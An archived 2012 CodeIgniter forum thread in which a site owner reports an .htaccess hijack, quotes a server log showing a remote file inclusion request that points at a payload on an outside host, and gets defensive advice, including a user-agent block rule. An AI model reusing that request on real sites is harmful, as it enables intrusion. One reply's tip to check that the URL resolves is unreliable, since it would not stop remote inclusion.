Welcome Guest, Not a member yet? Register   Sign In
CodeIgniter Forums Archived Discussions Archived General Discussion Help! My Codeigniter site was hacked
Help! My Codeigniter site was hacked
  • El Forum
    Guest
  •  
#1
09-10-2012, 02:16 AM

[eluser]gfields[/eluser]
Hi guys,
my website, based on codeigntier 1.7.2, was hacked again with php injection.
They modified the htaccess file to redirect every request to another file (common.php).

My host service sent me this line of server log, that seems to hold the responsible of the
attack: GET /products/getprod/5/index.php?option=com_advertising&controller=http://werisetogether.org//wp-content/themes/canvas/cache/task.jpg? HTTP/1.1" 200 14501 "-" "libwww-perl/5.805"

How can I avoid this kind of attack?

Thanks for your help

Gabriele
  • El Forum
    Guest
  •  
#2
09-10-2012, 06:18 AM

[eluser]PhilTem[/eluser]
Your .htaccess was hacked with an PHP Injection? Wow, that sounds pretty awesome of the hackers. Kudos to the hackers.

But anyway, I think you can avoid such things with two easy things:

First, fix the permissions of your files. Usually your webserver runs with a different username than you might want to create/store the files with. So you can easily modify the file permissions to allow editing only by the owner but executing by everyone.

Second, always keep your CI version up-to-date. The most recent, stable, and secure "build" is v2.1.2. You're still one major version behind which is probably the most vulnerable point of your site.

And maybe a third one as well: If you got proper code that is has lots of unit-testing it shouldn't be a problem at all. And don't forget one golden rule of development:

Never trust user input
  • El Forum
    Guest
  •  
#3
09-10-2012, 06:40 AM

[eluser]gfields[/eluser]
Thank you PhilTem, I'll follow your golden rules but - more specifically - is it possible to avoid that, simply appending code to the uri, someone can cause all these troubles?

I found this code to put in the htaccess file:

RewriteCond %{HTTP_USER_AGENT} libwww-perl [NC]
RewriteRule ^ - [F]

What do you think? Can it be useful?

ps: ok, it's not php injection but how can i call it? htaccess injection? Smile
  • El Forum
    Guest
  •  
#4
09-10-2012, 07:31 AM

[eluser]PhilTem[/eluser]
If anyone appends anything to the URI, it should first of all never be a problem as long as you don't evaluate it. I could add some URI-arguments to the URI of these forums, nothing should happen as long as I don't get some specific trigger (Just tried to do codeigniter.com/index.php?c=forums&m=viewthread and got a 404, just to show you what I mean Wink)

Googleing a little on your problem taught me some things about PHP injection that I didn't know before.
In particular, I had a closer look at these two pages
http://isc.sans.edu/diary.html?storyid=9478
http://www.v-nessa.net/2006/12/30/php-in...or-dummies

This might help you as well understanding the dangers of PHP injection.

On your htaccess-code: I'm not that familiar with RewriteConditions but from what I know about it your code looks good and should hopefully prevent any further hacks.

Maybe you should also put a security check on the controller argument in your URI and first see if it is a valid URL (i.e. resolving to a server) before working with that argument.




Theme © iAndrew 2016 - Forum software by © MyBB